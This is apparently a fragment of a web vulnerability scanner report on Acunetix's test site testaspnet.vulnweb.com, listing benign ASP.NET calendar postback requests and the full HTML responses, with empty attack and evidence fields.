</HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8128&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAdOUEFdoIZGRkSMCWdUaDeRn%2BSBiIVgoZM4Gm2Hk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL9xJG4AgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDO1oW4aftaz9ZdiIZVBTqN1TC%2By8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:30 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAdOUEFdoIZGRkSMCWdUaDeRn+SBiIVgoZM4Gm2Hk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL9xJG4AgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDO1oW4aftaz9ZdiIZVBTqN1TC+y8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:White" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8304&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAKA5Sn9oIZGRk1d%2F4hXZ2PEhNaU%2FJIkz1j5eCmnU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLA6tbdAgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL7rPHKCMfP3Nlh%2BdCdfkMzeQzcAw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:02 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAKA5Sn9oIZGRk1d/4hXZ2PEhNaU/JIkz1j5eCmnU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLA6tbdAgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL7rPHKCMfP3Nlh+dCdfkMzeQzcAw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:White" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
